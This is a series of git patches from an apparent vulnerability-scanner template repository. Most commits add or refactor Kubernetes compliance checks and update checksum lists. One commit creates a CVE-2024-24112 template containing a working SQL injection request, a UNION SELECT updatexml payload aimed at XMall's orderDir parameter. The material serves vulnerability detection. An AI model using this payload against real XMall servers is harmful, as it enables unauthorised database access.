http/cves/2020/CVE-2020-7961.yaml:6e6a2d87ac59b710e9f06ac8468de57cd0695f9a http/cves/2020/CVE-2020-7980.yaml:1b8c02806c66311834a931181b6acb7fada2bc9d -http/cves/2020/CVE-2020-8115.yaml:0a84aa21d38f9a2892376783c4ea79a386141504 +http/cves/2020/CVE-2020-8115.yaml:6f19a8294b923f314ce8b28098bd70e55a123858 http/cves/2020/CVE-2020-8163.yaml:1d8b50738e8aa4b505e6dda88b20fa7716de3ee5 http/cves/2020/CVE-2020-8191.yaml:eb7ce1550e3c02349142058d5a0b9a713e810915 http/cves/2020/CVE-2020-8193.yaml:4284d6d0a6afaa9469244d30d5ff29ff306d8ce6 @@ -7659,6 +7659,7 @@ http/vulnerabilities/gitlab/gitlab-rce.yaml:173dd50897b2956f85fce08f9730f740415e http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml:969333f355e024ef605152fe26bb45511f20f4ad http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml:8d551aa4f723d8e79ee57beb2f491c86f5b6cffc http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:83312ba18791464992c70dd4fe10965ba1ed2244 +http/vulnerabilities/gradio/gradio-lfi.yaml:a69850b3a69de67b39650086e3b710acd4ae465b http/vulnerabilities/gradio/gradio-ssrf.yaml:c0a20caa4fb295071efb720890b54bee093c0fda http/vulnerabilities/grafana/grafana-file-read.yaml:7f8fa8a6408dbbd25e7c33bc203024a131b85704 http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f @@ -8661,7 +8662,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f8b0b07c018966642248df8c0cf0b0799fa87926 +templates-checksum.txt:86bac7e8379bf85b45635c5c2ba0558fa72032eb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From badfed1740c94637fdcde686d4db6fe792ca5903 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 10:46:34 +0000 Subject: [PATCH 0346/1841] Auto Generated New Template Addition List [Tue Jun 18 10:46:34 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 10c13059b0..fc72aa24e6 100644 --- a/.new-additions +++ b/.new-additions @@ -27,5 +27,6 @@ http/exposed-panels/wildix-collaboration-panel.yaml http/misconfiguration/apache/apache-server-status-localhost.yaml http/misconfiguration/cookies-without-secure.yaml http/technologies/nperf-server-detect.yaml +http/vulnerabilities/gradio/gradio-lfi.yaml http/vulnerabilities/gradio/gradio-ssrf.yaml network/detection/mikrotik-ssh-detect.yaml From 4e6ab21446f78b9795f2bf12ebe367abb74d8ed9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 10:47:22 +0000 Subject: [PATCH 0347/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 00be36dff2..222f4679d8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -32,6 +32,7 @@ on: - 'http/misconfiguration/apache/apache-server-status-localhost.yaml' - 'http/misconfiguration/cookies-without-secure.yaml' - 'http/technologies/nperf-server-detect.yaml' + - 'http/vulnerabilities/gradio/gradio-lfi.yaml' - 'http/vulnerabilities/gradio/gradio-ssrf.yaml' - 'network/detection/mikrotik-ssh-detect.yaml' workflow_dispatch: From 906d2b890f94a028dc1574d8cc941209559b33c9 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 10:47:51 +0000 Subject: [PATCH 0348/1841] Auto Template Signing [Tue Jun 18 10:47:51 UTC 2024] :robot: --- http/vulnerabilities/gradio/gradio-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/gradio/gradio-lfi.yaml b/http/vulnerabilities/gradio/gradio-lfi.yaml index 7dc1240758..1be770ce1e 100644 --- a/http/vulnerabilities/gradio/gradio-lfi.yaml +++ b/http/vulnerabilities/gradio/gradio-lfi.yaml @@ -61,3 +61,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100dee488452114cf8cba3e74b09165ce96dd590f0ac0705828cdc977a8a8bd5f39022100d64d96b1ba3cd9e79039f6b3436f1cf7fd37e88bb8bb0249b76423524c3939a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 825c9ad585a96c2470355e9c922b51c4d8b234cc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 18 Jun 2024 16:20:39 +0530 Subject: [PATCH 0349/1841] Create CVE-2024-24112.yaml --- http/cves/2024/CVE-2024-24112.yaml | 50 ++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/cves/2024/CVE-2024-24112.yaml diff --git a/http/cves/2024/CVE-2024-24112.yaml b/http/cves/2024/CVE-2024-24112.yaml new file mode 100644 index 0000000000..86397ec9c4 --- /dev/null +++ b/http/cves/2024/CVE-2024-24112.yaml @@ -0,0 +1,50 @@ +id: CVE-2024-24112 + +info: + name: Exrick XMall - SQL Injection + author: DhiyaneshDk + severity: critical + description: | + xmall v1.1 was discovered to contain a SQL injection vulnerability via the orderDir parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-24112 + - https://github.com/Exrick/xmall/issues/78 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-24112 + cwe-id: CWE-89 + epss-score: 0.00076 + epss-percentile: 0.32712 + cpe: cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: exrick + product: xmall + fofa-query: app="XMall-后台管理系统" + tags: cve,cve2024,xmall,sqli + +variables: + num: "{{rand_int(9000000, 9999999)}}" + +http: + - raw: + - | + GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,{{md5(num)}},0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + X-Requested-With: XMLHttpRequest + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{md5(num)}}" + - "MySQLSyntaxErrorException" + condition: and + + - type: status + status: + - 200 From 7ae624e9d87bb031cdc6028fd616f006dbda25a5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Tue, 18 Jun 2024 15:16:02 +0400 Subject: [PATCH 0350/1841] updated DSLs --- .../security-compliance/k8s-audit-log-path-set.yaml | 8 +++++--- .../kubernetes/security-compliance/k8s-enc-prov-conf.yaml | 8 ++++++-- .../security-compliance/k8s-etcd-cafile-set.yaml | 7 +++++-- .../security-compliance/k8s-etcd-files-set.yaml | 6 +++++- .../security-compliance/k8s-ns-usage-check.yaml | 8 +++++--- .../security-compliance/k8s-svc-acct-issuer-set.yaml | 6 +++++- .../kubernetes/security-compliance/k8s-svc-acct-key.yaml | 8 +++++--- .../security-compliance/k8s-svc-acct-lookup-set.yaml | 6 +++++- .../security-compliance/k8s-tls-config-set.yaml | 8 +++++--- 9 files changed, 46 insertions(+), 19 deletions(-) diff --git a/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml b/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml index 0566d127fa..d705b4bd37 100644 --- a/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml @@ -13,6 +13,9 @@ info: - https://kubernetes.io/docs/tasks/debug-application-cluster/audit/ tags: cloud,devops,kubernetes,security,devsecops,api-server +variables: + argument: "audit-log-path" + self-contained: true code: - engine: @@ -35,6 +38,5 @@ code: extractors: - type: dsl dsl: - - "API server configuration is missing the audit-log-path argument." - -# digest: 4c0a006730b50222003e5c33fedeeb5d9b8b9af1d43e89b7b8b97c51aa77c345d7f976f9350e22e746022 + - '"API server configuration is missing the " + argument + " argument."' +# digest: 4a0a0047304502204104b24f090bfea60d25246f47dd468a5696ce9e436fe282748f60d6c4929718022100c4902c1fc9855589dda168845c10e65647624c849700bcb556ada0418a10136a:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml b/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml index 4a95a30227..b755b9ff12 100644 --- a/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml +++ b/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml @@ -13,6 +13,9 @@ info: - https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/ tags: cloud,devops,kubernetes,security,devsecops,encryption +variables: + argument: "encryption-provider-config" + self-contained: true code: - engine: @@ -29,10 +32,11 @@ code: - type: word words: - - "--encryption-provider-config" + - "encryption-provider-config" negative: true extractors: - type: dsl dsl: - - "Encryption provider configuration is not appropriately set." \ No newline at end of file + - '"API server configuration is missing the " + argument + " argument"' +# digest: 4b0a00483046022100d14427c3db24f5ff548847a899b85731aa480204820c6d9916a85e01dfd67939022100aeefbe775d7dade76e9c6df085d0fca70f39ead3c3374b189912d92b646253ad:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml b/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml index e0a05ee92e..6607c49e47 100644 --- a/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml @@ -13,6 +13,9 @@ info: - https://etcd.io/docs/v3.5/op-guide/security/ tags: cloud,devops,kubernetes,security,devsecops,etcd +variables: + argument: "etcd-cafile" + self-contained: true code: - engine: @@ -35,5 +38,5 @@ code: extractors: - type: dsl dsl: - - "Etcd configuration is missing the etcd-cafile argument." -# digest: 490a004630440220707289eec6b2f08d1bc88620d1d58ff41c2f661a0956d079441ee324f9ae7591022003d8bd244a842d8ba73ac829f52bb4790ab780328b5f42299d826d12d5728039:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file + - '"Etcd configuration is missing the " + argument + " argument"' +# digest: 4a0a004730450220594bb2a708ae66a4c884326cc844ef1f6886bf8a0b305630686bd04feeb76136022100fd52f890fc86dd1b66edf3798c51cda58cff07559fe9ea37f851eeec416fd052:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml b/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml index 342f97c575..7a6160556f 100644 --- a/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml @@ -13,6 +13,9 @@ info: - https://etcd.io/docs/v3.4.0/op-guide/security/ tags: cloud,devops,kubernetes,security,devsecops,etcd +variables: + argument: "etcd-certfile or etcd-keyfile" + self-contained: true code: - engine: @@ -36,4 +39,5 @@ code: extractors: - type: dsl dsl: - - "etcd server configuration is missing the etcd-certfile or etcd-keyfile arguments." + - '"etcd server configuration is missing the " + argument + " arguments."' +# digest: 4a0a00473045022100cfc23ca747bd1aecd67bf39514f649aaaff7816196d78c5dc95666a03cb4c5090220365eb627df9b1bca710f3a45ef2371ab91d59dd2e43f3d180cd95b119ca758b3:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml b/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml index 64f7d6a04b..a16b69c46b 100644 --- a/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml +++ b/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml @@ -13,6 +13,9 @@ info: - https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/ tags: cloud,devops,kubernetes,security,devsecops,namespaces +variables: + argument: "namespaces" + self-contained: true code: - engine: @@ -35,6 +38,5 @@ code: extractors: - type: dsl dsl: - - "Kubernetes cluster is not utilizing namespaces." - -# digest: 4b0a00483046022100a4752be32718d5e3bf67d19c2 + - '"Kubernetes cluster is not utilizing " + argument' +# digest: 490a0046304402202672a3c25ca835a804437f2745bf15f10a66112c320e7a5b51dfe586de57195d0220710bfe5832faacbd8efd9f24794ba191e008f325933688c53fc3a982a784da90:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml index 823bcf2729..2ef75035b1 100644 --- a/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml @@ -13,6 +13,9 @@ info: - https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/ tags: cloud,devops,kubernetes,security,devsecops,api-server +variables: + argument: "service-account-issuer" + self-contained: true code: - engine: @@ -35,4 +38,5 @@ code: extractors: - type: dsl dsl: - - "API server configuration lacks the service-account-issuer argument." \ No newline at end of file + - '"API server configuration lacks the " + argument + " argument."' +# digest: 4a0a00473045022100c383c51f45c32761519dc9ae727df05e29281c3c290d9d57d16db6930fa148b20220228d5e842cdfd0f2c0b6cdf7361d18f45d9ed24f62d49ce47aa81ec2a470e548:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml index 3c48a6ed5f..297ea44109 100644 --- a/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml @@ -13,6 +13,9 @@ info: - https://kubernetes.io/docs/admin/kube-apiserver/ tags: cloud,devops,kubernetes,security,devsecops,api-server +variables: + argument: "service-account-key-file" + self-contained: true code: - engine: @@ -35,6 +38,5 @@ code: extractors: - type: dsl dsl: - - "API server configuration is missing the service-account-key-file argument." - -# digest: 4a0a00473045022100e3dc33fefeeb5d3b9a9af3d43e89b7b7c97c50aa77b344d7e976f9340e22e7450220159e8da06b7ceb82c532bd1caeeeffba7c237c568a57988f1ada334a7c09fa83:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file + - '"API server configuration is missing the " + argument + " argument."' +# digest: 4b0a00483046022100d90abd4d95997cdae687e28ede25e595c3567439758ad5e5b8adf28ac88684ff022100a25db689afdc09e1640bf03bd0b212e5e20b0b4b1532723c985c617f99fb5ad8:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml index 049615a486..5168e9aaf8 100644 --- a/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml @@ -13,6 +13,9 @@ info: - https://kubernetes.io/docs/admin/kube-apiserver/ tags: cloud,devops,kubernetes,security,devsecops,api-server +variables: + argument: "service-account-lookup=true" + self-contained: true code: - engine: @@ -35,4 +38,5 @@ code: extractors: - type: dsl dsl: - - "API server configuration is missing the 'service-account-lookup=true' argument." + - '"API server configuration is missing the \"" + argument + "\" argument."' +# digest: 4b0a0048304602210085946e152e8d65fcadb1a22c5eac0e8376ed742a2f8932f74e3dbf2d30411a24022100c5c0c4d7313d6e28cb338c82c20170e4ae7f5b45ae784715be32160b4314e357:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml b/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml index 8c982f216a..30b5c65b75 100644 --- a/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml @@ -13,6 +13,9 @@ info: - https://kubernetes.io/docs/admin/kube-apiserver/ tags: cloud,devops,kubernetes,security,devsecops,api-server +variables: + argument: "tls-cert-file or tls-private-key-file" + self-contained: true code: - engine: @@ -36,6 +39,5 @@ code: extractors: - type: dsl dsl: - - "API server configuration is missing the tls-cert-file or tls-private-key-file argument." - -# digest: 4a0a00473045022100e3dc33fefeeb5d3b9a9af3d43e89b7b7c97c50aa77b344d7e976f9340e22e7450220159e8da06b7ceb82c532bd1caeeeffba7c237c568a57988f1ada334a7c09fa83:366f2a24c8eb519f6968bd8801c08ebe + - '"API server configuration is missing the " + argument + " argument."' +# digest: 490a00463044022061ee1577d8528e7614d9ad92ed72f68f00426fc1d950015d2bef6fce8fbf285402207dd62ff126ce6129997240e3edc31f8adaf047cf5c341ba65b0ff1851b35ee99:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file From 623251bba4061baaf9184b33ecf3e65fbeebe3a9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Tue, 18 Jun 2024 15:27:27 +0400 Subject: [PATCH 0351/1841] fixed lint error --- cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml | 2 +- .../kubernetes/network-policies/k8s-netpol-egress-rules.yaml | 4 ++-- .../network-policies/k8s-network-ingress-rules.yaml | 4 ++-- cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml | 2 +- cloud/kubernetes/pods/k8s-readonly-rootfs.yaml | 2 +- cloud/kubernetes/pods/k8s-root-user-id.yaml | 2 +- .../security-compliance/k8s-svc-acct-issuer-set.yaml | 4 ++-- 7 files changed, 10 insertions(+), 10 deletions(-) diff --git a/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml b/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml index ca1b3adbbb..b59ecb43f6 100644 --- a/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml +++ b/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml @@ -37,7 +37,7 @@ javascript: - code: | deployment = JSON.parse(template.deployment); deployment.spec.template.spec.containers.forEach(container => { - if (container.securityContext && container.securityContext.seccompProfile && + if (container.securityContext && container.securityContext.seccompProfile && (container.securityContext.seccompProfile.type === 'RuntimeDefault' || container.securityContext.seccompProfile.type === 'DockerDefault')) { // No action needed, configured properly } else { diff --git a/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml b/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml index b8f6316dbb..f08f42535b 100644 --- a/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml +++ b/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml @@ -1,4 +1,4 @@ -id: netpol-egress-rules +id: k8s-netpol-egress-rules info: name: Network policies define egress rules @@ -34,7 +34,7 @@ code: javascript: - code: | - let policyData = JSON.parse(template.policy); + let policyData = JSON.parse(template.policy); if (!policyData.egress || policyData.egress.length === 0) { let result = (`Network policy '${policyData.policy}' does not define egress rules.`); Export(result); diff --git a/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml b/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml index 0d8070c784..f0d245847d 100644 --- a/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml +++ b/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml @@ -1,4 +1,4 @@ -id: k8s-ingress-rules +id: k8s-network-ingress-rules info: name: Define network ingress rules @@ -35,7 +35,7 @@ code: javascript: - code: | - let policyData = JSON.parse(template.policy); + let policyData = JSON.parse(template.policy); if (!policyData.ingress || policyData.ingress.length === 0) { let result = `Network policy '${policyData.policy}' does not define any ingress rules.`; Export(result); diff --git a/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml index d85b30b78d..aaef1e10e3 100644 --- a/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml +++ b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml @@ -34,7 +34,7 @@ code: javascript: - code: | - let podData = JSON.parse(template.container); + let podData = JSON.parse(template.container); podData.containers.forEach(container => { if (container.securityContext && container.securityContext.allowPrivilegeEscalation === true) { let result = (`Container '${container.name}' in pod '${podData.pod}' running with allowPrivilegeEscalation enabled.`); diff --git a/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml b/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml index 2937a1f1b1..8f59478b73 100644 --- a/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml +++ b/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml @@ -35,7 +35,7 @@ code: javascript: - code: | - let podData = JSON.parse(template.pod); + let podData = JSON.parse(template.pod); podData.containers.forEach(container => { if (container.securityContext && container.securityContext.readOnlyRootFilesystem !== true) { let result = (`Container '${container.name}' in pod '${podData.pod}' is not running with a read-only root filesystem.`); diff --git a/cloud/kubernetes/pods/k8s-root-user-id.yaml b/cloud/kubernetes/pods/k8s-root-user-id.yaml index 24185e320b..e2cd9a2db3 100644 --- a/cloud/kubernetes/pods/k8s-root-user-id.yaml +++ b/cloud/kubernetes/pods/k8s-root-user-id.yaml @@ -34,7 +34,7 @@ code: javascript: - code: | - let podData = JSON.parse(template.pod); + let podData = JSON.parse(template.pod); podData.containers.forEach(container => { if (container.securityContext && container.securityContext.runAsUser === 0) { let result = (`Container '${container.name}' in pod '${podData.pod}' is running with root user ID.`); diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml index 2ef75035b1..ac65cadc8e 100644 --- a/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml @@ -23,13 +23,13 @@ code: - bash source: | kubectl get pods -n kube-system -l component=kube-apiserver -o jsonpath="{.items[*].spec.containers[*].command}" - + matchers-condition: and matchers: - type: word words: - 'kube-apiserver' - + - type: word words: - "service-account-issuer" From 980a25b60b6a81b3ad106d852125847b3e39669d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 18 Jun 2024 17:24:32 +0530 Subject: [PATCH 0352/1841] Update mantisbt-default-credential.yaml --- .../default-logins/mantisbt/mantisbt-default-credential.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/default-logins/mantisbt/mantisbt-default-credential.yaml b/http/default-logins/mantisbt/mantisbt-default-credential.yaml index 335c42ab6f..527a3b0906 100644 --- a/http/default-logins/mantisbt/mantisbt-default-credential.yaml +++ b/http/default-logins/mantisbt/mantisbt-default-credential.yaml @@ -55,6 +55,11 @@ http: - "Change Log" condition: and + - type: regex + part: header_3 + regex: + - "Location: .*?/login_cookie_test.php\\?return=account_page.php" + - type: status status: - 200 From 814e793cc2dd18103839c3bc3c3f1dcc048d27b1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Tue, 18 Jun 2024 16:04:45 +0400 Subject: [PATCH 0353/1841] added kubernetes cluster security profile --- cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml | 2 +- cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml | 2 +- .../kubernetes/deployments/k8s-default-namespace-used.yaml | 2 +- cloud/kubernetes/deployments/k8s-host-ports-check.yaml | 2 +- .../deployments/k8s-image-pull-policy-always.yaml | 2 +- cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml | 2 +- .../deployments/k8s-liveness-probe-not-configured.yaml | 2 +- cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml | 2 +- .../kubernetes/deployments/k8s-memory-requests-not-set.yaml | 2 +- .../deployments/k8s-minimize-added-capabilities.yaml | 2 +- cloud/kubernetes/deployments/k8s-privileged-container.yaml | 2 +- .../kubernetes/deployments/k8s-readiness-probe-not-set.yaml | 2 +- .../deployments/k8s-root-container-admission.yaml | 2 +- cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml | 2 +- cloud/kubernetes/kubernetes-code-env.yaml | 2 +- .../network-policies/k8s-netpol-egress-rules.yaml | 2 +- cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml | 2 +- .../network-policies/k8s-network-ingress-rules.yaml | 2 +- .../kubernetes/pods/k8s-allow-privilege-escalation-set.yaml | 2 +- cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml | 2 +- .../kubernetes/pods/k8s-host-network-namespace-shared.yaml | 2 +- cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml | 2 +- cloud/kubernetes/pods/k8s-readonly-fs.yaml | 2 +- cloud/kubernetes/pods/k8s-readonly-rootfs.yaml | 2 +- cloud/kubernetes/pods/k8s-root-user-id.yaml | 2 +- .../security-compliance/k8s-audit-log-path-set.yaml | 2 +- cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml | 2 +- .../kubernetes/security-compliance/k8s-etcd-cafile-set.yaml | 2 +- .../kubernetes/security-compliance/k8s-etcd-files-set.yaml | 2 +- .../kubernetes/security-compliance/k8s-ns-usage-check.yaml | 2 +- .../security-compliance/k8s-svc-acct-issuer-set.yaml | 2 +- cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml | 2 +- .../security-compliance/k8s-svc-acct-lookup-set.yaml | 2 +- .../kubernetes/security-compliance/k8s-tls-config-set.yaml | 2 +- profiles/k8s-cluster-security.yml | 6 ++++++ 35 files changed, 40 insertions(+), 34 deletions(-) create mode 100644 profiles/k8s-cluster-security.yml diff --git a/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml b/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml index 7daf55f8d7..3331f2e607 100644 --- a/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml @@ -11,7 +11,7 @@ info: Set CPU limits for all containers in Kubernetes Deployments to ensure fair CPU resource distribution and prevent performance issues. reference: - https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/ - tags: cloud,devops,kubernetes,k8s,devsecops,deployments + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml b/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml index 319677a594..a01635ee99 100644 --- a/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml @@ -11,7 +11,7 @@ info: Set CPU requests for all containers in Kubernetes Deplayments to ensure efficient scheduling and resource allocation. reference: - https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/ - tags: cloud,devops,kubernetes,k8s,devsecops,deployments + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml b/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml index 2a35ad6add..84d60d93c7 100644 --- a/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml +++ b/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml @@ -11,7 +11,7 @@ info: Avoid using the default namespace for Kubernetes Deployments. Create and specify dedicated namespaces tailored to specific applications or teams to enhance security and manage resources effectively. reference: - https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/ - tags: cloud,devops,kubernetes,k8s,devsecops,namespaces + tags: cloud,devops,kubernetes,k8s,devsecops,namespaces,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/deployments/k8s-host-ports-check.yaml b/cloud/kubernetes/deployments/k8s-host-ports-check.yaml index 0d8fb6bd3b..d712e1f097 100644 --- a/cloud/kubernetes/deployments/k8s-host-ports-check.yaml +++ b/cloud/kubernetes/deployments/k8s-host-ports-check.yaml @@ -11,7 +11,7 @@ info: Avoid using host ports in Kubernetes Deployments. Use services or other networking mechanisms to expose container applications. reference: - https://kubernetes.io/docs/concepts/services-networking/service/ - tags: cloud,devops,kubernetes,security,devsecops,deployments + tags: cloud,devops,kubernetes,devsecops,deployments,k8s,k8s-cluster-security flow: | code(1); diff --git a/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml b/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml index 17c192b3af..86f2892484 100644 --- a/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml +++ b/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml @@ -10,7 +10,7 @@ info: remediation: Update the image pull policy in Kubernetes Deployments to 'Always' to ensure that the latest container images are always used. reference: - https://kubernetes.io/docs/concepts/containers/images/#updating-images - tags: cloud,devops,kubernetes,k8s,devsecops,deployments,images,docker + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,images,docker,k8s-cluster-security flow: | code(1); 